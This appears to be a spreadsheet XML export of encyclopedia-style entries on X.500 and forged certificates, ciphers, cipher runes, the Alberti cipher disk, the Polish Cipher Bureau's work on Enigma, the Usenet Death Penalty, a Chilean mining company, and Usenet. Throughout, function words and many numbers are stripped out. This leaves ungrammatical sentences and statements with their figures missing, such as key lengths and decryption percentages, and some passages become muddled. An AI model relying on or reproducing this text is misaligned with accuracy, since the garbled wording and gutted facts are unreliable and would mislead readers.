providing another layer assurance regarding binding certificate identity. recent events (2011) indicated threat unknown actors nation states forged certificates. this done order create mitm attack political activists syria accessing facebook web. this would normally triggered browser warning, would mitm certificate issued valid certificate authority already trusted browser software. similar attacks used stuxnet allowed software impersonate trusted code. point certificate transparency allow user determine, using simple procedure certificate fact valid. checking default bundle certificates enough this, therefore additional check desired. other suggestions certificate transparency also advanced.a different attack used comodo, certificate authority, resulted forged certificates directed high-profile communications websites. this necessitated emergency patch major browsers. these certificates actually issued trusted certificate authority, therefore user would warning gone faked website, contrast syria incident, certificate crudely forged, including substituting alto palo, palo alto. incorrect serial numbers. some projects designed exchange phi, protected health information (which considered highly hipaa sensitive) obtain x.509v3 certs cert resource record, ldap x.500[2008] directory. issue authoritative bind detailed rfcs related accuracy information secured signing root using dnssec. concept root name servers source major contention internet community, largely resolved. name space associated x.500 traditionally thought start national naming authority, mirrors iso/itu approach global systems national representation. thus different countries create unique x.500 services. u.s. x.500 privatized 1998, u.s. government longer offered x.500 registration outside known government agencies. x.500 pilot project development commercial space, technology continues present major installations millions users within corporate data centers, within u.s. government credentialing. list x.500 series standards criticism authors 2693 (concerning spki) note "the original x.500 plan unlikely ever come fruition. collections directory entries... considered valuable even confidential owning lists likely released world form x.500 directory sub-tree." "the x.500 idea distinguished name single, globally unique name everyone could referring entity) also likely occur." "x.500 complex support desktops internet, ldap created provide service 'for rest us'." also iso/iec 1/sc references external links "rfc1485: string representation distinguished names". 1993. retrieved 2021-02-10. many applications make distinguished names (dn) defined directory, commonly known x.500 [cci88]. this specification assumes familiarity x.500, concept distinguished name. chadwick, (1994). "understanding x.500 directory". retrieved 2017-12-06. x500standard.com x.500 community site guide x.500 standard repository existing work carried standard. wayback machine (archived january 2019)</t>
  </si>
  <si>
    <t>Cipher</t>
  </si>
  <si>
    <t>cryptography, cipher cypher) algorithm performing encryption decryption—a series well-defined steps followed procedure. alternative, less common term encipherment. encipher encode convert information cipher code. common parlance, "cipher" synonymous "code", steps encrypt message; however, concepts distinct cryptography, especially classical cryptography. codes generally substitute different length strings character output, ciphers generally substitute number characters input. there exceptions cipher systems slightly more, fewer, characters output versus number input. codes operated substituting according large codebook linked random string characters numbers word phrase. example, "uqjhse" could code "proceed following coordinates." when using cipher original information known plaintext, encrypted form ciphertext. ciphertext message contains information plaintext message, format readable human computer without proper mechanism decrypt operation cipher usually depends piece auxiliary information, called (or, traditional parlance, cryptovariable). encrypting procedure varied depending key, changes detailed operation algorithm. must selected using cipher encrypt message. without knowledge key, extremely difficult, impossible, decrypt resulting ciphertext readable plaintext. most modern ciphers categorized several ways whether work blocks symbols usually fixed size (block ciphers), continuous stream symbols (stream ciphers). whether used encryption decryption (symmetric algorithms), different used (asymmetric algorithms). algorithm symmetric, must known recipient sender else. algorithm asymmetric one, enciphering different from, closely related deciphering key. cannot deduced other, asymmetric algorithm public/private property keys made public without loss confidentiality. etymology roman number system cumbersome, part concept zero. arabic numeral system spread arabic world europe middle ages. transition, arabic word zero (sifr) adopted medieval latin cifra, middle french cifre. this eventually english word cipher (minority spelling cypher). theory term came refer encoding concept zero confusing europeans, term came refer message communication easily understood.the term cipher later also used refer arabic digit, calculation using them, encoding text form arabic numerals literally converting text "ciphers". versus codes non-technical usage, "(secret) code" typically means "cipher". within technical discussions, however, words "code" "cipher" refer different concepts. codes work level meaning—that words phrases converted something else chunking generally shortens message. example commercial telegraph code used shorten long telegraph messages resulted entering commercial contracts using exchanges telegrams. another example given whole word ciphers, allow user replace entire word symbol character, much like japanese utilize kanji (meaning chinese characters japanese) characters supplement language. "the quick brown jumps lazy dog" becomes "the quick brown jumps lazy ciphers, hand, work lower level: level individual letters, small groups letters, modern schemes, individual bits blocks bits. some systems used codes ciphers system, using superencipherment increase security. cases terms codes ciphers also used synonymously substitution transposition. historically, cryptography split dichotomy codes ciphers; coding terminology, analogous ciphers: "encoding, codetext, decoding" however, codes variety drawbacks, including susceptibility cryptanalysis difficulty managing cumbersome codebook. because this, codes fallen disuse modern cryptography, ciphers dominant technique. types there variety different types encryption. algorithms used earlier history cryptography substantially different modern methods, modern ciphers classified according operate whether keys. historical historical paper ciphers used past sometimes known classical ciphers. they include simple substitution ciphers (such rot13) transposition ciphers (such rail fence cipher). example, "good dog" encrypted "pllx xlp" substitutes "o", "g", message. transposition letters "good dog" result "dgogdoo". these simple ciphers examples easy crack, even without plaintext-ciphertext pairs.simple ciphers replaced polyalphabetic substitution ciphers (such vigenère) changed substitution alphabet every letter. example, "good dog" encrypted "plsx twf" "l", "s", substitute "o". with even small amount known estimated plaintext, simple polyalphabetic substitution ciphers letter transposition ciphers designed paper encryption easy crack. possible create secure paper cipher based one-time though, usual disadvantages one-time pads apply. during early twentieth century, electro-mechanical machines invented encryption decryption using transposition, polyalphabetic substitution, kind "additive" substitution. rotor machines, several rotor disks provided polyalphabetic substitution, plug boards provided another substitution. keys easily changed changing rotor disks plugboard wires. although encryption methods complex previous schemes required machines encrypt decrypt, machines british bombe invented crack encryption methods. modern modern encryption methods divided criteria: type used, type input data. type used ciphers divided into: symmetric algorithms (private-key cryptography), used encryption decryption, asymmetric algorithms (public-key cryptography), different keys used encryption decryption.in symmetric algorithm (e.g., aes), sender receiver must shared advance kept secret parties; sender uses encryption, receiver uses decryption. feistel cipher uses combination substitution transposition techniques. most block cipher algorithms based structure. asymmetric algorithm (e.g., rsa), separate keys: public published enables sender perform encryption, private kept secret receiver enables person perform correct decryption. ciphers distinguished types type input data: block ciphers, encrypt block data fixed size, stream ciphers, encrypt continuous streams data. size vulnerability pure mathematical attack, (i.e., lacking information help break cipher) factors count: computational power available, i.e., computing power brought bear problem. important note average performance/capacity single computer factor consider. adversary multiple computers once, instance, increase speed exhaustive search (i.e., "brute force" attack) substantially. size, i.e., size used encrypt message. size increases, complexity exhaustive search point becomes impractical crack encryption directly.since desired effect computational difficulty, theory would choose algorithm desired difficulty level, thus decide length accordingly. example process found length uses multiple reports suggest symmetrical cipher bits, asymmetric cipher 3072 keys, elliptic curve cipher bits, similar difficulty present. claude shannon proved, using information theory considerations, theoretically unbreakable cipher must keys least long plaintext, used once: one-time pad. also autokey cipher cover-coding encryption software list ciphertexts steganography telegraph code notes references richard aldrich, gchq: uncensored story britain's most secret intelligence agency, harpercollins july 2010. helen fouché gaines, "cryptanalysis", 1939, dover. isbn 0-486-20097-3 ibrahim al-kadi, "the origins cryptology: arab contributions", cryptologia, 16(2) (april 1992) 97–126. david kahn, codebreakers story secret writing (isbn 0-684-83130-9) (1967) david king, ciphers monks forgotten number notation middle ages, stuttgart: franz steiner, 2001 (isbn 3-515-07640-9) abraham sinkov, elementary cryptanalysis: mathematical approach, mathematical association america, 1966. isbn 0-88385-622-0 william stallings, cryptography network security, principles practices, edition stinson, douglas (1995), cryptogtaphy theory practice, press, isbn 0-8493-8521-0 external links kish cypher</t>
  </si>
  <si>
    <t>Cipher runes</t>
  </si>
  <si>
    <t>cipher runes, cryptic runes, cryptographical replacement letters runic alphabet. preservation knowledge cipher runes best preserved iceland, 17th–18th centuries, icelandic scholars produced several treatises subject. notable manuscript runologia ólafsson (1705–1779), wrote copenhagen (1732–1752). thoroughly treats numerous cipher runes runic ciphers, preserved arnamagnæan institute copenhagen.jón ólafsson's treatise presents younger futhark viking order, means m-rune precedes l-rune. this small detail paramount importance interpretation viking cipher runes 13th century runes changed places influence latin alphabet precedes since medieval runic calendar used post-13th-century order, early runologists 17th–18th centuries believed order original one, order runes vital importance interpretation cipher runes. structure ciphers runic alphabet, runes special order divided groups. younger futhark, letters, divided three groups. icelandic tradition calls first group "freyr's ætt", second group "hagal's ætt" third group tyr’s ætt". order make inscription even harder decipher, freyr's tyr's change places group group three vice versa. however, several cases ætts counted correct order, backwards. there numerous forms cipher runes, based principle giving number number rune within ætt. tent runes based strokes added four arms shape: each represents runes read clockwise, starting left arm. strokes first representing (row eight runes: fuþarkgw, hnijæpzs, tbemlŋod), strokes second denote order within ætt. branch runes similar, strokes attached vertical stem branching upwards. strokes left indicate ætt, strokes right order within ætt. there variants schemes, inverting numbers (counting backwards ætts, runes within ætts). tree runes hook runes like branch runes, strokes pointing downward diagonally curving downward, respectively. these mixed: phrase vitki left, written straightforward branch runes, vitki written ætts hooks order branches. there several runestones using devices obscuring inscription, especially found orkney. comparable system letter modification ogham "scales" recorded ogam tract. also bind rune list runestones ogham notes references enoksen, lars magnar (1998), runor: historia, tydning, tolkning, falun: historiska media, isbn 91-88930-32-7.</t>
  </si>
  <si>
    <t>Cipher disk</t>
  </si>
  <si>
    <t>cipher disk enciphering deciphering tool developed 1470 italian architect author leon battista alberti. constructed device, (eponymously called alberti cipher disk) consisting concentric circular plates mounted other. larger plate called "stationary" smaller "moveable" since smaller could move "stationary".the first incarnation disk plates made copper featured alphabet, order, inscribed outer edge disk cells split evenly along circumference circle. this enabled alphabets move relative creating easy key. rather using impractical complicated table indicating encryption method, could much simpler cipher disk. this made encryption decryption faster, simpler less prone error. methods encryption cipher disk used ways. code consistent monoalphabetic substitution entire cipher disks moved periodically throughout cipher making polyalphabetic. monoalphabetic use, sender person receiving messages would agree cipher setting (e.g., regular alphabet would positioned next cipher alphabet). entire message encoded according key. addition simple substitution ciphers, cipher disk opened convenient polyalphabetic ciphers. easy sender recipient agree certain number characters message, scales would shifted character right, repeating procedure every (say) tenth letter. this would make difficult crack, using statistical methods. variations cipher disks many small variations basic design. instead letters would occasionally combinations numbers outer disk combination corresponding letter. make encryption especially hard crack, advanced cipher disk would combinations numbers. instead though, used since numerals look upside things often cipher disk) right side up.cipher disks would also additional symbols commonly used combinations letters like "ing", "tion", "ed". symbols also frequently added indicate "and" word. weaknesses when encoding message using cipher disk, character always used mean “end word.” frequency said character abnormally high thus easily detected. character, however, omitted, words together takes much longer recipient read message. remedy this, cipher disks multiple characters stand "end word." similarly cipher disk also multiple characters could used letter (the common letter english) instead character frequency roughly 13%, would characters stood frequency users could also keyword characters including letter would change throughout ciphertext. popular culture since 1930s, cipher disks labeled "decoders" used novelties. many cipher disks radio premiums called "secret decoder rings." also alberti cipher disk, also known formula references</t>
  </si>
  <si>
    <t>Cipher Bureau (Poland)</t>
  </si>
  <si>
    <t>cipher bureau, polish: biuro szyfrów ([ˈbʲurɔ ˈʂɨfruf] (listen), interwar polish general staff's second department's unit charged sigint cryptography (the ciphers codes) cryptanalysis (the study ciphers codes, purpose "breaking" them). precursor agency would become cipher bureau created 1919, polish-soviet (1919–21), played vital role securing poland's survival victory war. mid-1931, cipher bureau formed merger pre-existing agencies. december 1932, bureau began breaking germany's enigma ciphers. over next seven years, polish cryptologists overcame growing structural operating complexities plugboard-equipped enigma. bureau also broke soviet cryptography. five weeks outbreak world july 1939, warsaw, polish cipher bureau revealed enigma-decryption techniques equipment representatives french british military intelligence, unable make headway enigma. this polish intelligence-and-technology transfer would give allies unprecedented advantage (ultra) ultimately victorious prosecution world background 1919 józef serafin stanslicki established polish army "cipher section" (sekcja szyfrów), precursor "cipher bureau" (biuro szyfrów). cipher section reported polish general staff contributed substantially poland's defense józef piłsudski's forces polish-soviet 1919–21, thereby helping preserve poland's independence, recently regained wake world cipher section's purview included ciphers codes. polish term "cipher" ("szyfr") loosely refers principal categories cryptography. (compare opposite practice english, loosely refers codes ciphers "codes".) during polish–soviet (1919–1921), approximately hundred russian ciphers broken sizable cadre polish cryptologists included army lieutenant kowalewski three world-famous professors mathematics stefan mazurkiewicz, wacław sierpiński stanisław leśniewski. russian army staffs still following disastrously ill-disciplined signals-security procedures tsarist army staffs world decisive advantage german enemy. result, polish-soviet polish military regularly kept informed russian signals stations movements russian armies intentions operational orders. soviet staffs, according polish colonel mieczysław ścieżyński, "had slightest hesitation sending messages operational nature means radiotelegraphy; periods when, purposes operational communications purposes command higher staffs, means communication whatever used, messages transmitted either entirely ("in clear," plaintext) encrypted means incredibly uncomplicated system trained specialists reading messages child's play. held chitchat personnel radiotelegraphic stations, discipline disastrously lax." crucial month august 1920 alone, polish cryptologists decrypted signals: soviet general mikhail tukhachevsky, commander northern front leon trotsky, soviet commissar commanders armies, example: commander rkka army, yevgenii nikolaievich sergeev commander cavalry army, semyon budionny commander cavalry corps, staffs xii, armies staffs mozyr group (named belarusian city) zolochiv group (after ukrainian town) yakir group [after general iona emmanuilovich yakir] infantry divisions cavalry divisionetc.the intercepts rule decrypted day, latest next day, immediately sent polish general staff's section (intelligence) operational section. important signals read entirety chief general staff, even commander chief, marshal józef piłsudski. interception reading signals provided polish intelligence entire russian operational orders. poles able follow whole operation budionny's cavalry army second half august 1920 incredible precision, monitoring radiotelegraphic correspondence tukhachevsky, including famous historic conflict russian commanders.the intercepts even included order trotsky revolutionary council western front, confirming tukhachevsky's operational orders, thus giving authority supreme chief soviet armed forces. entire operational order tukhachevsky budionny intercepted august read august, stating tasks tukhachevsky's armies, essence previously known.ścieżyński surmises soviets must likewise intercepted polish operational signals; doubts would availed much, since polish cryptography "stood abreast modern cryptography" since small number polish higher headquarters equipped radio stations, great shortage; finally, polish headquarters cautious russians almost every polish division land line.polish cryptologists enjoyed generous support command col. tadeusz schaetzel, chief polish general staff's section (intelligence). they worked warsaw's radio station war, polish long-range radio transmitters time. polish cryptologists' work led, among many things, discovery large army's left flank, enabled poland's marshal józef piłsudski drive war-winning wedge august 1920 battle warsaw.the discovery cipher bureau's archives, decades polish-soviet war, borne ścieżyński's assertion that... radio intelligence... furnished [the polish commander-in-chief, józef piłsudski], years 1919–1920... complete and... current intelligence aspects functioning army, especially units operating anti-polish front, radio intelligence large degree determined course all... military operations conducted poland 1920 january fighting ovruch, march operation mozyr kiev, april operation ukraine, battles tukhachevsky's first second offensives belarus, battles budionny's cavalry army, battle brody, battles warsaw, lwów niemen. cipher bureau mid-1931, polish general staff, cipher bureau formed merging radio-intelligence office (referat radiowywiadu) polish-cryptography office (referat szyfrów własnych). bureau charged cryptography generation, supervision use, ciphers codes cryptology, study ciphers codes, particularly purpose "breaking" them.between 1932 1936, cipher bureau took additional responsibilities, including radio communications military-intelligence posts poland abroad, well radio counterintelligence mobile direction-finding intercept stations locating traffic-analysis fifth-column transmitters operating poland. stalking enigma late 1927 early 1928, arrived warsaw customs office germany package that, according accompanying declaration, supposed contain radio equipment. german firm's representative strenuously demanded package returned germany even going customs, shipped equipment mistake. insistent demands alerted customs officials, notified polish general staff's cipher bureau, took keen interest developments radio technology. since happened saturday afternoon, bureau's experts ample time look matter. they carefully opened found not, fact, contain radio equipment cipher machine. they examined machine minutely, back box.the bureau's leading enigma cryptanalyst marian rejewski commented cipher machine surmised commercial-model enigma since time military model devised. "hence trivial episode practical importance, though date cipher bureau's interest enigma machine began" manifested, initially, entirely legal acquisition single commercial-model enigma.on july 1928, first german machine-enciphered messages broadcast german military radio stations. polish monitoring stations began intercepting them, cryptologists polish cipher bureau's german section instructed read them. effort fruitless, however, eventually abandoned. there remained slight evidence effort, form densely written-over sheets paper commercial-model enigma machine. january 1929 major gwido langer, tour duty chief staff legion infantry division, became chief radio-intelligence office, subsequently cipher bureau. bureau's deputy chief, chief german section (bs-4), captain maksymilian ciężki. 1929, cipher bureau's predecessor agency still headed major franciszek pokorny relative outstanding world austro-hungarian army cryptologist, captain herman pokorny), ciężki, franciszek pokorny, civilian bureau associate, antoni palluth, taught secret cryptology course poznań university selected mathematics students. over years later, world france, students, marian rejewski, would discover entire course taught french general marcel givièrge's book, cours cryptographie (course cryptography), published 1925.in september 1932, maksymilian ciężki hired three young graduates poznań course bureau staff members: marian rejewski, jerzy różycki henryk zygalski. successes setbacks 1926, german navy adopted, cryptographic device, modified civilian enigma machine; 1928 german army followed suit. complexity system much increased 1930 introduction plugboard (steckerbrett), albeit connecting leads use. december 1932, marian rejewski made historian david kahn describes greatest advances cryptologic history, applying pure mathematics theory permutations groups breaking german armed forces' enigma machine ciphers. rejewski worked precise interconnections enigma rotors reflector, bureau received, french military intelligence captain gustave bertrand, german documents pages enigma daily keys (for september october year). these obtained french military intelligence agent, german codenamed rex, agent worked germany's cipher office berlin, hans-thilo schmidt, french codenamed asché. after rejewski worked military enigma's logical structure, polish cipher bureau commissioned radio company, co-owned antoni palluth, build replicas ("doubles") enigma rejewski's specifications. method decrypting enigma messages exploited weaknesses german operating procedures. used rejewski called "characteristics" independent plugboard connections. this involved compiling card catalog certain features indicator settings.the germans increased difficulty decrypting enigma messages decreasing interval changes order rotors quarterly, initially, monthly february 1936, daily october year, also increased number plugboard leads number varied five eight. this made biuro's grill method much less easy, relied unsteckered letter pairs. german navy security-conscious army force, 1937 introduced new, much secure, indicator procedure remained unbroken several years.the next setback occurred november 1937, scrambler's reflector changed different interconnections (known umkehrwalze-b). rejewski worked wiring reflector, catalog characteristics compiled anew, using rejewski's "cyclometer", built specifications radio company.in january 1938, colonel stefan mayer directed statistics compiled two-week period, comparing numbers enigma messages solved, enigma intercepts. ratio came percent. "nor," marian rejewski commented, "were percent limit possibilities. with slightly augmented personnel, might attained percent read. certain amount cipher material faulty transmission reception, various causes, always remains unread ..." information obtained enigma decryption seems directed b.s.-4 principally german office general staff's section (intelligence). there, fall 1935 mid-april 1939, worked major leśniak, april 1939 would turn german office another officer form situation office intended wartime service. would head situation office september 1939 campaign. system pre-defining indicator setting enigma operators given network, method characteristics depended, changed september 1938. exception network used sicherheitsdienst (sd)—the intelligence agency nazi party—who make change july 1939. operators chose indicator setting. however, insecure procedure sending enciphered message twice remained use, quickly exploited. henryk zygalski devised manual method used perforated sheets, marian rejewski commissioned company produce bomba kryptologiczna (cryptologic bomb).both zygalski-sheet method bomba worked single scrambler rotor order, sets zygalski sheets bomby produced. however, germans introduced rotors december 1938, giving choice three five assemble machines given day. this increased number possible rotor orders biuro could read small minority messages used neither rotors. they resources produce bomby sets zygalski sheets. fortunately, however, fact network still using method indicator setting messages, allowed rejewski re-use previous method working wiring within rotors. this information essential production full zygalski sheets allowed resumption large-scale decryption january 1940. january 1939, germans made military enigma even difficult break increasing number plugboard connections five eight, seven ten.when world broke september 1939, leśniak colleagues working intensively three years establish german order battle succeeded working nearly percent german attack poland came surprise polish general staff. results obtained polish intelligence, according leśniak, "absolutely exceeded would normally possible." kabaty woods until 1937 cipher bureau's german section, bs-4, housed polish general staff building stately 18th-century "saxon palace" warsaw. that year bs-4 moved specially constructed facilities kabaty woods near pyry, south warsaw. there, working conditions incomparably better cramped quarters general staff building.the move dictated well requirements security. germany's abwehr always looking potential traitors among military civilian workers general staff building. strolling agents, even lacking access staff building, could observe personnel entering leaving, photograph concealed miniature cameras. annual abwehr intelligence assignments german agents warsaw placed priority securing informants polish general staff. gift allies kabaty woods, pyry, july 1939, looming, that, instructions polish general staff, cipher bureau's chiefs, col. gwido langer major maksymilian ciężki, three civilian mathematician-cryptologists, col. stefan mayer, chief intelligence, revealed poland's achievements cryptanalytical representatives france britain, explaining broken enigma. they undertook give country polish-reconstructed enigma, along details equipment, including zygalski sheets rejewski's cryptologic bomb. return, british pledged prepare full sets zygalski sheets possible wheel orders. french contingent consisted major gustave bertrand, french radio-intelligence cryptology chief, capt. henri braquenié french force staff. british sent commander alastair denniston, head britain's government code cypher school, dilly knox, chief british cryptanalyst commander humphrey sandwith, head royal navy's intercept direction-finding stations.when rejewski working reconstructing german military enigma machine late 1932, ultimately solved crucial element, wiring letters alphabet entry drum, inspired guess might wired simple alphabetical order. now, trilateral meeting rejewski later recount "the first question dillwyn knox asked was: 'what connections entry drum?'" knox mortified learn simple answer was.the poles' gift, western allies, enigma decryption, five weeks outbreak world came moment soon. former bletchley park mathematician-cryptologist gordon welchman written: "ultra would never gotten ground learned poles, nick time, details german military enigma machine, operating procedures use." allied supreme commander dwight eisenhower, war's end, described intelligence bletchley park priceless value simplified task commander enormously." eisenhower expressed thanks "decisive contribution allied effort."churchill's greatest wartime fear, even hitler suspended operation lion invaded soviet union, german submarine wolfpacks would succeed strangling sea-locked britain. major factor averted britain's defeat battle atlantic regained mastery naval enigma decryption; latter benefited crucially british seizure german enigma-equipped naval vessels, breaking german naval signals ultimately relied techniques pioneered polish cipher bureau. britain capitulated hitler, united states would deprived essential forward base subsequent involvement european north african theaters.a week pyry meeting, dillwyn knox, letter dated august 1939, thanked poles, polish, "for cooperation patience." enclosed little paper batons scarf picturing derby horse race evidently emblematic cryptological race knox hoped using batons, whose loss gallantly acknowledging.on september 1939, became clear poland unlikely halt ongoing german invasion, bs-4 received orders destroy part files evacuate essential personnel. bureau abroad during german invasion poland september 1939, cipher bureau personnel evacuated southeast and—after soviets invaded eastern poland september—into romania, destroying cryptological equipment documentation. eventually, crossing yugoslavia still-neutral italy, reached france. some personnel cipher bureau's german section worked enigma, workers radio company built enigma doubles cryptologic equipment german section, remained poland. some interrogated gestapo, gave away secret polish mastery enigma decryption. bruno, outside paris, october 1939 poles resumed work german enigma ciphers close collaboration britain's government code cypher school bletchley park.in interest security, allied cryptological services, sending messages teleprinter line, encrypted using enigma doubles. henri braquenié often closed messages "heil hitler!" late december 1939, col. gwido langer, accompanied captain braquenié, visited london bletchley park, british asked polish cryptologists turned them. langer, however, took position polish team must remain polish armed forces formed french soil. mathematicians might actually reached britain much earlier much comfortably eventually did; september 1939, went british embassy bucharest, romania, brushed preoccupied british diplomat.in january 1940, british cryptanalyst alan turing spent several days bruno conferring polish colleagues. brought poles full zygalski sheets produced bletchley park john jeffreys using polish-supplied information. january 1940, poles made first break wartime enigma traffic—that october 1939. during period, collapse france june 1940, ultimately percent enigma keys found, solved bletchley park, remaining percent bruno. rejewski commented: could otherwise, three [polish cryptologists] [there were] least several hundred british cryptologists, since 10,000 people worked bletchley... besides, recovery keys also depended amount intercepted cipher material, amount greater british side french side. finally, france contrast work poland) sought daily keys, finding also read messages.... surprised poles many percent keys credit. inter-allied cryptologic collaboration prevented duplication effort facilitated discoveries. before fighting started norway april 1940, polish-french team solved uncommonly hard three-letter code used germans communicate fighter bomber squadrons exchange meteorological data aircraft land. code first appeared december 1939, polish cryptologists preoccupied enigma give code much attention. with german assault west impending, however, breaking luftwaffe code took mounting urgency. trail elusive code (whose system letters changed every hours) back enigma. first clue came british, noticed code's letters change randomly. changed elsewhere replaced british made headway, poles realized manifesting enigma's exclusivity principle discovered 1932. germans' carelessness meant poles, midnight solved enigma's daily setting, could effort also read luftwaffe signals.the germans, opening 1940 offensive west would trample belgium, luxembourg netherlands order reach borders france, changed procedure enciphering message keys, rendering zygalski sheets "completely useless" temporarily defeating joint british-polish cryptologic attacks enigma. according gustave bertrand, took superhuman day-and-night effort overcome difficulty: decryption resumed."following capitulation france june 1940, poles evacuated algeria. october 1940, resumed work "cadix", near uzès unoccupied southern, vichy france, sponsorship gustave bertrand.a little years later, november 1942, bertrand learned allies landed french north africa ("operation torch"). knowing eventuality germans planned occupy vichy france, november evacuated cadix. days later, november, germans indeed marched southern france. morning november occupied cadix.over years since establishment october 1940, cadix decrypted thousands wehrmacht, gestapo messages, originating french territory across europe, provided invaluable intelligence allied commands resistance movements. cadix also decrypted thousands soviet messages.having departed cadix, polish personnel evaded occupying italian security police german gestapo sought escape france spain. jerzy różycki, graliński piotr smoleński died january 1942 sinking, mediterranean sea, french passenger ship, lamoricière, returning southern france tour duty algeria.marian rejewski henryk zygalski hiked pyrenees guide (who robbed gunpoint) spanish border, arrested january 1943. they incarcerated spaniards three months released, upon cross intervention, 1943. they managed, circuitous land–sea–air route, join polish armed forces britain, rejewski zygalski inducted polish army privates (they would eventually promoted lieutenant) work breaking german hand ciphers polish signals facility boxmoor. because occupied france, british considered risky invite work bletchley park.finally, mathematicians' cryptologic work close world cipher bureau ceased exist. from nearly inception 1931 war's 1945, bureau, sometimes incorporated aggregates cryptonyms bruno cadix), essentially agency, core personnel, carrying much tasks; extinguished. neither rejewski zygalski would work cryptologists. late 1946 rejewski returned family devastated politically altered poland, live another years death february 1980. zygalski would remain england death august 1978. secret preserved despite travails, rejewski zygalski fared better colleagues. cadix's polish military chiefs, langer ciężki, also captured—by germans, tried escape france spain night march 10–11, 1943—along three poles: antoni palluth, edward fokczyński kazimierz gaca. first became prisoners war; three sent slave labourers germany, palluth fokczyński perished. despite varyingly dire circumstances held, none them—stefan mayer emphasizes—betrayed secret enigma's decryption, thus making possible allies continue exploiting vital intelligence resource.before war, palluth, lecturer 1929 secret poznań university cryptology course, co-owner ava, produced equipment cipher bureau, knew many details decryption technology. warsaw, german occupation, cipher bureau workers interrogated german intelligence commissions, workers approached german agents, kept silent compromises enigma. popular culture 1967 polish military historian władysław kozaczuk, book bitwa tajemnice (the battle secrets), first revealed german enigma broken polish cryptologists world kozaczuk's disclosure came seven years winterbotham's ultra secret (1974) changed conventional views history war.the 1979 polish film sekret enigmy (the enigma secret) generally fair, superficial, account cipher bureau's story. twenty-two years later, 2001 hollywood film enigma criticized many historical inaccuracies, including omission poland's fundamental work enigma decryption. also ultra marian rejewski tadeusz pełczyński polish school mathematics history polish intelligence services wilfred dunderdale notes references bibliography external links laurence peter, poles cracked nazi enigma secret, news, july 2009 "polish enigma double" "the enigma code breach," bury enigma enigma intelligence "codebreaking secret weapons world ii," bill momsen brief history computing technology, 1930 1939 "the poles crack enigma" (from greg goebel's codes, ciphers, codebreaking) nsa/css national cryptologic museum unveils polish enigma exhibit ieee history center: "the invention enigma polish broke before start wwii" breaking enigma polish mathematicians dermot turing said uncle's achievements cracking german communications encrypted enigma machines based work group polish mathematicians: turing cult obscured role polish codebreakers</t>
  </si>
  <si>
    <t>Usenet Death Penalty</t>
  </si>
  <si>
    <t>usenet, usenet death penalty (udp) final penalty issued internet service providers single users produce much spam fail adhere usenet standards. named death penalty (the state-sanctioned killing person punishment crime), causes banned user provider unable usenet, essentially "killing" service. messages fall jurisdiction usenet death penalty cancelled. cancelled messages deleted usenet servers allowed propagate. this causes users affected unable post usenet, puts pressure change policies. notable cases include actions taken uunet, compuserve, excite@home. types there three types usenet death penalty: active: active udp, messages fall automatically cancelled third parties agents, using cancelbots. passive: passive udp, messages fall simply ignored spread. partial: partial applies certain subset newsgroups, entire usenet newsgroup hierarchy.to effective, must supported large number servers, majority major transit servers. otherwise, articles propagate throughout smaller, slower peerings. udps casual acts. they announced beforehand, owner offending server contacted given several chances correct perceived problem. since effects users server significant, users want post, impact induce operators offending server address problems quickly. udps issued america online, planet, compuserve, erols internet, netcom, tiac uunet. history first software written karl kleinpaste 1990, though disagreement term coined: abuse claims 1993, message posted august year claims coined "years earlier" eliot lear.a implemented uunet august 1997 became host many spammers unresponsive abuse complaints. forced provider implement antispam policies tools close open relays. executives called "digital terrorism", threatened legal action, asserted planning move spammers anyway. volume spam uunet decreased, organizers called penalty august though announcement stifled cancel messages opponents.an active implemented compuserve november 1997, lifted following company implemented anti-spamming measures instituted acceptable policy addressing spamming.a scheduled begin excite@home january 2000 lifted scheduled begin began scanning misconfigured proxy servers home users' computers blamed spam originating network. also shadow banning kill file damnatio memoriae references external links entry usenet death penalty jargon file cancel messages: frequently asked questions, part (v1.75) antispam strike telstra moves avert spam death penalty</t>
  </si>
  <si>
    <t>Andes Iron</t>
  </si>
  <si>
    <t>andes iron chilean exploration mining company major projects chile. dominga project proposed open-pit copper mine accompanying processing plant, desalination plant, slurry pipelines export port. history planning minería activa began investing prospecting phase mines 2008. mediterráneo fondo inversión (fip), largest investor minería activa spa, agreed establishing mine santa dominga norte area town higuera.in 2009, chilean businessman, presidential candidate soon-to-be president chile sebastián piñera began invest andes iron mediterráneo fondo inversión (fip) according radio bío-bío.the project quickly challenged environmentalists, including marine conservation organisation oceana, potential impact humboldt penguin national reserve wider marine ecology area, describe marine biodiversity hotspot. project's environmental license rejected 2017. approval government president sebastián piñera, elected second non-consecutive term, successfully appealed rejection dominga's environmental license company expected start work dominga project 2020. company stated would prepared concede proposed port totoralillo, coquimbo compañía minera pacífico, subsidiary chilean iron producer cap, permitted construct proposed cruz grande port nearby. pandora papers pandora papers leak october 2021, president piñera named revealed documents. according spanish newspaper país, chilean media organizations ciper labot allegedly documented piñera involved "particularly controversial activity". pandora leak reported piñera sold minera dominga friend since childhood, carlos alberto délano, shortly entering presidency 2010. reported small transaction first made chile subsequently larger payments made british virgin islands.in response leak, piñera's business manager said piñera control companies twelve years aware sale minera dominga friend carlos alberto délano. ownership company's project, iman, prospective iron mine. owned 50-50 partnership minería activa. andes iron majority owned delano mendez family (74%), minor interests held garcez silva family (14%), company's directors (11%). references</t>
  </si>
  <si>
    <t>Usenet</t>
  </si>
  <si>
    <t>usenet worldwide distributed discussion system available computers. developed general-purpose unix-to-unix copy (uucp) dial-up network architecture. truscott ellis conceived idea 1979, established 1980. users read post messages (called articles posts, collectively termed news) topic categories, known newsgroups. usenet resembles bulletin board system (bbs) many respects precursor internet forums become widely used. discussions threaded, forums bbss, though posts stored server sequentially.a major difference message board usenet absence central server dedicated administrator hosting provider. usenet distributed among large, constantly changing news servers store forward messages another "news feeds". individual users read messages post local simply preferred) news server, operated anyone, posts automatically forwarded news servers peered local one, local server receive news peers currently lacks. this results automatic proliferation content posted user server user subscribed newsgroups servers. bbss message boards, individual news servers service providers obligation carry specific content, refuse many reasons: news server might attempt control spread spam refusing accept forward posts trigger spam filters, server without high-capacity data storage refuse carry newsgroups used primarily file sharing, limiting discussion-oriented groups. however, unlike bbss forums, dispersed nature usenet usually permits users interested receiving content access simply choosing connect news servers carry feeds want. usenet culturally historically significant networked world, given rise popularized, many widely recognized concepts terms "faq", "flame", sockpuppet, "spam". early 1990s, shortly access internet became commonly affordable, usenet connections fidonet's dial-up networks made long-distance worldwide discussions communication widespread, needing server, (local) telephone service.the name usenet comes term "users' network". first usenet group net.general, quickly became net.general. first commercial spam usenet immigration attorneys canter siegel advertising green card services.on internet, usenet transported network news transfer protocol (nntp) port standard, unprotected connections port encrypted connections. introduction usenet conceived 1979 publicly established 1980, university north carolina chapel 